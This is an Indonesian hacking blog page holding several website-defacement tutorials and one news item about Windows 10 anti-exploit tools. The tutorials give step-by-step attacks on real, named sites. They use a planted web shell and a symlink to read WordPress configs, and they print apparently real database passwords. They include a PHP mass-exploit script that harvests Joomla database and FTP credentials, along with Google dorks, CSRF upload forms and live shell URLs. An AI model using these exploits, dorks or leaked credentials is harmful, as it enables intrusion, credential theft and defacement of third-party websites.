Jumat, 23 Juni 2017

Teknik Deface Metode Symlink / Jump Directory


Blog.Bagus - Halo sob, kali ini saya akan berbagi cara menggunakan Symlink.
Saya anggap agan udah punya target dan sudah di pasang Backdoor/shell di web target, saya tidak akan menjelaskan caranya, karena saya anggap agan sudah bisa mencari target sendiri.

Pertama masuk ke Shell yang sudah di tanam di web target.
lalu upload Sym.php ( Digunakan untuk SYMLINK ).
Klo belum punya silahkan Download Disini Sob



Pada gambar di atas saya sudah upload sym.php melalui shell yang saya tanam.


Selanjutnya akses / buka symlink yang telah agan upload.




Lalu klik user & domain & symlink.



Terlihat banyak sekali target-target lain, dan yang akan saya jadikan target adalah thefussyeater.org lalu klik "symlink".




Lalu kita cari confignya, dan target saya ini wordpress saya menemukan wp-config.php lalu saya klik.


Jika CMS Joomla cari saja configuration.php, jika CMS Lokomedia, cari saja di config/koneksi.php, jika CMS Balitbang cari saja di lib/config.php.




Perhatikan baris ini :

define('DB_HOST', 'localhost');
DB NAME = thefussy_wrdp3
DB USER = thefussy_wrdp3
DB PASSWORD = CZyLRz1EuwSd
DB HOST = localhost

Diatas adalah informasi mengenai Akses Database MySQL.


Lalu setelah mendapatkan informasi username & password Database MySQL seperti diatas, kembali ke shell pertama.



Klik koneksi MySQL.



Lalu isi dengan data - data yang telah di peroleh pada file configurasi  diatas tadi, dan saya klik Connect.


Jika di dalam shell agan tidak ada menu Koneksi MySQL Download INI lalu Upload , akses dan login.



Lalu, saya klik "wp_user".




Terlihat passwordnya dalam bentuk encrypt md5, jadi kita rubah saja.
Agan buat password dalam bentuk MD5 Disini Sob.




Saya mencoba password 121212 dan setelah di enskripsi menjadi 93279e3308bdbbeed946fc965017f67a Lalu saya rubah password wp-user nya dan saya ganti dengan password saya 93279e3308bdbbeed946fc965017f67a




Saya sudah merubah dengan 93279e3308bdbbeed946fc965017f67a dan saya klik confirm untuk menyimpan pengaturannya, dan pada pengaturan selanjutnya klik Yes.


Berarti saya akan login dengan username admin dan password 121212.
Sekarang kita coba sob.


Saya coba ke halaman loginwebnya http://thefussyeater.org/wp-admin


Saya login & wauuuuu, kereennn sob.


Saya berhasil masuk.




Jika sudah seperti ini terserah anda sob, kalo pengen nanam shell silahkan, asal jangan lupa di backup file pentingnya dan jangan di rusak.


Selamat Mencoba.
Sekian & Terima kasih...
Read more

Teknik Exploit Joomla com_cckjseblod LFD PHP

Default Dork:
inurl:option=com_cckjseblod

Link vuln:

www.site.com/index.php?option=com_cckjseblod&task=download&file=configuration.php

PoC:
var $dbtype = 'mysql';
var $host = 'localhost:3306';
var $user = 'star-_nice_mz';
var $db = 'star-pk_StarDB';
var $dbprefix = 'jos_';
var $mailer = 'smtp';
var $mailfrom = 'noreply@xxx.com';
var $fromname = 'Web Master, Star Marketing Pvt. Ltd.';
var $sendmail = '/usr/sbin/sendmail';


Script Auto exploit :


<?php
@error_reporting(0);
@set_time_limit(0);

print "
___________.__       .___                         _______       .___      
\_   _____/|  |    __| _/___________  ______ ____ \   _  \    __| _/____  
 |    __)_ |  |   / __ |/ __ \_  __ \/  ___// ___\/  /_\  \  / __ |/ __ \ 
 |        \|  |__/ /_/ \  ___/|  | \/\___ \\   \___\  \_/   \/ /_/ \  ___/ 
/_______  /|____/\____ |\___  >__|  /____  >\___  >\_____  /\____ |\___  >
        \/            \/    \/           \/     \/       \/      \/    \/
  The Hacker make tool not tool make a hacker :)
" ;

$y=@file_get_contents($argv[1]);
$ec=explode("\r\n",$y);
$open=fopen("result.html","a");

foreach ($ec as $links){
  $lofe="$links/index.php?option=com_cckjseblod&task=download&file=configuration.php";
  $gg=@file_get_contents($lofe);
  if(preg_match("#class JConfig#",$gg)){
     echo "\n[+] $links ==> infected\n";fwrite($open,"<br>[+] $links <br>");
     preg_match("#tmp_path = '(.*?)\/tmp';#",$gg,$r);echo "    [-] path of site : $r[1]/\n";fwrite($open,"path of site : $r[1] <br>");

     echo "\t[*]>--database informations --< \n";  ///// Database info
     preg_match("#host = '(.*?)';#",$gg,$r);echo "\t\t[!] Host : $r[1]\n";fwrite($open,"host : $r[1] <br>");
     preg_match_all("#user = '(.*?)';#",$gg,$rr);echo "\t\t[!] user : ".$rr[1][1]."\n";$aaa=$rr[1][1];fwrite($open,"user :$aaa <br>");
     preg_match("#password = '(.*?)';#",$gg,$r);echo "\t\t[!] password : $r[1]\n";fwrite($open,"pass : $r[1] <br>");
     preg_match("#db = '(.*?)';#",$gg,$r);echo "\t\t[!] Database : $r[1]\n";fwrite($open,"db: $r[1] <br>");

     echo "\t[*]>--Ftp informations --< \n";    /////// Ftp info
     preg_match("#ftp_enable = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp enable : $r[1]\n";
     preg_match("#ftp_host = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp_host : $r[1]\n";fwrite($open,"ftp-host : $r[1] <br>");
     preg_match("#ftp_port = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp port : $r[1]\n";fwrite($open,"ftp-port : $r[1] <br>");
     preg_match("#ftp_user = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp user : $r[1]\n";fwrite($open,"ftp-user : $r[1] <br>");
     preg_match("#ftp_pass = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp pass : $r[1]\n";fwrite($open,"ftp-pass : $r[1] <br>");
     preg_match("#ftp_root = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp root : $r[1]\n";
  }else{
    echo "\n[+] $links ==> Not infected\n";
  }
}
fclose($open);
?>



Cara penggunaan :
website target masukin ke file .txt terus save script d atas .php (skrip ama list target hrus 1 folder/taruh desktop ja biar mudah)
Run cmd: php sekripmu.php list.txt

Cara eksekusi target :
Auto exploit di atas auto get info db ama ftp. nah biasanya buat yg awam pasti bingung gimna cara tanem shell/defacenya.


Misal lu dapet db, tinggal masukin detail db ke tool Adminer trus login...


Misal dapet ftp account, lu tinggal konekin lwat FileZilla/Core FTP...


Misal dapet db ama ftp lngkap, ya di balikkan lagi pada anda, mau di apakan target tersebut...

Sekian & Terima kasih...
Read more

Wordpress Themes WPLocalPlaces Upload Vulnerability


############################################################################
Exploit Title  : Wordpress Themes WPLocalPlaces Upload Vulnerability

Google Dork    : inurl:"/wp-content/plugins/spotlightyour/"

Software Link  : http://freelancewp.com/wordpress-theme/wp-local-places/
############################################################################
[+] POC

Exp. Target :
- http://domain.com/wp-content/themes/WPLocalPlaces/

Exploit :
- /monetize/upload/index.php

Shell Access :
- http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php


[+]Demo

Live Target :
http://southbayautopros.com/wp-content/themes/WPLocalPlaces/monetize/upload/index.php
see it http://i.imgur.com/3NsmWdt.jpg

Shell Access :
http://southbayautopros.com/wp-content/uploads/2013/10/13820893341435692459.php
see it http://i.imgur.com/4e8hHzA.jpg

#############################################################################

Sekian & Terima kasih...
Read more

WordPress Army Knife CSRF File Upload Vulnerability


# Exploit Title: WordPress Army Knife CSRF File Upload Vulnerability
# Vendor Homepage: http://freelancewp.co
# Themes Link: http://freelancewp.com/wordpress-theme/army-knife/
# Infected File: upload-handler.php
# Category: webapps/php
# Google dork: inurl:/wp-content/themes/armyknife
# Tested on : Windows/Linux
#######################################################################

# Exploit & POC :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/th...andler.php" method="post">
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

# File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/yourshell.php

Sekian & Terima kasih...
Read more

Windows 10 Versi terbaru akan Di Bekali Tool Anti Exploit program




Blog.Bagus - Pasca serangan ransomware WannaCry yang menargetkan pengguna komputer dengan sistem operasi Windows bulan lalu yang menginfeksi jutaan komputer di seluruh dunia, kini Microsoft di kabarkan akan membekali sistem operasi buatan  mereka, Windows 10 versi terbaru dengan tool Anti Exploit program.
Hal itu menyusul pembaharuan besar-besaran pada sistem operasi mereka guna lebih meningkatkan keamanan perangkat yang menggunakan Windows 10. Hal lain yang paling mencolok dari pembaharuan sistem mereka adalah dengan di hapusnya Server Message Block versi 1 (SMBv1) yang menjadi pintu masuk malware pada windows 10 versi terbaru mereka
Windows 10 Versi Anyar akan Di Bekali Tool Anti Exploit program

Di lansir dari Threatpost (20/06/2017) Juru bicara Microsoft baru saja mengkonfirmasi hal ini  dengan mengatakan “Kami dapat memastikan bahwa SMBv1 telah dihapus untuk Redstone 3 (kode nama untuk windows 10 versi terbaru)”.
Dalam rangka meningkatkan standar keamanan sistem operasi Windows 10, microsoft juga akan membekali OS terbaru mereka dengan sebuah tool atau software anti exploit. Di beri kode nama EMET atau Enhanced Mitigation Experience Toolkit,adalah sebuah toolkit anti-eksploitasi gratis untuk sistem operasi Microsoft Windows yang di berikan secara cuma-cuma oleh Microsoft yang dirancang untuk meningkatkan keamanan komputer penggunanya dari ancaman yang lebih kompleks seperti kerentanan zero-day (0day).
Windows 10 Versi Anyar akan Di Bekali Tool Anti Exploit program
Selama ini EMET masih bersifat opsional, artinya pengguna harus mendownload lebih dahulu program tersebut untuk bisa menggunakannya. Namun kedepan toolkit ini kan secara resmi menjadi bagian standar keamanan Windows 10 keluaran terbaru mereka yang akan rilis pada September / Oktober 2017 mendatang.
Di kutip dari situs resmi Microsoft  EMET di desain untuk membantu melindungi sistem komputer penggunanya bahkan sebelum ancaman baru dan yang belum ditemukan yang tidak bisa di deteksi oleh software anti malware yang ada saat ini.
EMET diklaim akan menyediakan perlindungan keseluruhan sistem dan perlindungan khusus terhadap  aplikasi, yang bekerja dengan mengawasi sistem operasi internal untuk mengetahui eksploitasi dan lubang keamanan, serta memblokir serangan baik pada aplikasi OS dan pihak ketiga.
Selain itu, Tool Anti Exploit program EMET juga menawarkan perlindungan buffer overflow untuk aplikasi yang rentan terhadap serangan stack dan buffer overflow yang digunakan malware untuk berinteraksi dengan sistem operasi.
Oleh karena itu pihak Microsoft menyarankan para pengguna sistem oprasi buatan mereka untuk segera melakukan upgrade ke sistem operasi Windows 10 guna menghindari insiden penyanderaan data oleh ransomware kembali terulang dan mendapat jaminan kemanan yang lebih baik.
Sekian & Terima kasih...
Read more

Kamis, 22 Juni 2017

Teknik Deface Dengan Ajax File Manager


Blog.Bagus  - Oke Kali Ini Saya Akan Berbagi Tutorial Tentang Cara Deface Dengan Ajax File Manager

Sebelumnya Kita Harus Punya Dork Terlebih Dahulu.

Dork
intitle:"Ajax File Manager" site:au
inurl:/ajaxfilemanager.php intext:"/Root Folder"
inurl:/ajaxfilemanager.php intext:"upload"
inurl:/ajaxfilemanager.php .ac.
intitle:"index of" intext:"ajaxfilemanager.php"

Pilih Salah Satu Dork Dan Copy Kan Dork Ke Mbah Google




Kemudian Kita Cari Targetnya

Contoh :
http://fondazionebertoni.it/Scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=4

Akan Terlihat Seperti Ini, Kemudian Kita Klik Upload


 Upload script Kamu...


Kalau Sudah Di Upload Kemudian Jreng Jreng :).,, Kalau Mau Lihat Tinggal Tarik Yang Itunya :v...


Liat Hasilnya...

Sekian & Terima kasih...

Read more

Teknik Deface Dengan Roxy Fileman File Upload


Kali Ini Saya Akan Bahas Tentang Cara Deface Dengan Roxy Fileman File Upload,
Caranya Hampir Mirip Si Dengan cara-deface-dengan-ajax-file-manager 
oke langsung saja ya,

Dork 

intitle:"Roxy file manager" 

Copy Kan Dork Ke Mbah Google


 Kemudian Kita Cari Targetnya, Kalau Vuln Hasilnya Kayak Gini



Terus Kalau Mau Upload Script, Klik Add file , terus upload deh script mu



Kalau Mau Lihat Klik Preview, Kalau Udah Hasilnya Seperti Ini.


Sekian & Terima kasih...

Read more

Teknik deface Menggunakan Wordpress Themes Qualifire File Upload


Blog.Bagus - Kali Ini Saya Akan Share Tentang Cara Deface Wordpress Theme Theagency File Uplaod Langsung Saja Ya...

 =>Dork.
      inurl:/wp-content/themes/theagency

=>Exploit.
      /wp-content/themes/theagency/includes/uploadify/uploadify.php

=>CSRF

<form action="http://targetnya.com/wp-content/themes/theagency/includes/uploadify/uploadify.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="SIKAT!">

</form>

Langkah - Langkah:

1.Dorking Ke Mbah Google


2. Pilih Salah Satu Site,Cari Yang Vuln Yha Gan
        
Contoh: 
http://targetnya.com

Masukkan Eksploitnya Menjadi 

http://targetnya.com/wp-content/themes/theagency/includes/uploadify/uploadify.php

Kalau Vuln Tampilan Webnya=blank/Kosong


Copy Csrf Di Atas, Masukkan Site Ke Csrf, Save dengan format html. Kalau Sudah Buka File Csrf Kamu,terus Upload Deh ..



Kalau file nya suksek ke upload bakal muncul angka 1,Kalau Sudah Kita Cari Letak Filenya

Contoh : 
http://targetnya.com/wp-content/themes/theagency/includes/uploadify/uploads/namafileagan

Sekian & Terima kasih
Read more